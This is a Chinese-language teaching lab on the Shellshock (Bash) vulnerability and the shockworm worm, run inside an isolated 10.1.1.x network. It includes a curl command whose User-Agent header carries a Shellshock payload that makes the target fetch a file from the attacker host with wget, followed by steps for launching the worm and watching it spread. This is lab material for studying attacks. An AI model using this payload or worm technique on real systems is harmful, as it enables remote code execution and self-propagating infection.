本實驗分為三個任務：

任務一：判斷10.1.1.12主機web服務的test.cgi是否存在破殼漏洞；

任務二：蠕蟲發起者執行蠕蟲程式，感染1號主機Worm1；

任務三：觀察Worm1主機蠕蟲的傳播過程，檢查Worm2主機是否被感染。

任務描述：判斷10.1.1.12主機web服務的test.cgi是否存在破殼漏洞

1.使用ssh登入蠕蟲發起者主機（10.1.1.231），執行下面三條命令。命令執行結果如下圖所示。

[root@worm-master ~]# tail /var/log/httpd/access_log

[root@worm-master ~]# curl -A “() { :; }; /usr/bin/wget http://10.1.1.231/shock” http://10.1.1.12/test.cgi

[root@worm-master ~]# tail /var/log/httpd/access_log

2.根據最後一條命令的結果，蠕蟲發起者主機（10.1.1.231）的web日誌中出現了worm1的訪問記錄，說明worm1主機（10.1.1.12）存在破殼漏洞。

任務描述：蠕蟲發起者執行蠕蟲程式，感染1號主機Worm1。

1.為了避免自身被感染，向蠕蟲表明自己是發起者的身份，我們需要登入10.1.1.231主機，通過下面的命令建立一個檔案。

2.繼續在10.1.1.231上執行下面的命令，可以找到蠕蟲程式。

3.登入worm1，檢視/tmp目錄。

4.繼續返回10.1.1.231主機，執行下面的命令，來執行蠕蟲程式。

5.登入Worm1，執行下面的命令，觀察被感染的特徵。

通過對比/tmp目錄可以發現，Worm1已經被感染了shockworm蠕蟲程式

實驗步驟3

1.登入Worm1（10.1.1.12），不斷的執行命令:“ps aux |grep curl”可以看到蠕蟲的傳播過程，被感染的Worm1通過agent.1337程序，不斷的向同網段的其他主機發起攻擊與感染。如下所示：

從上面命令的執行結果，可以看出，蠕蟲正在攻擊10.1.1.92和10.1.1.93和10.1.1.98。

2.經過一段時間之後（大約10分鐘），登入Worm2。同樣使用命令:”ls -al /tmp”檢視，可以發現主機也被此蠕蟲感染。對比效果如下圖：

16:19分tmp目錄下產生了感染檔案。

課後習題：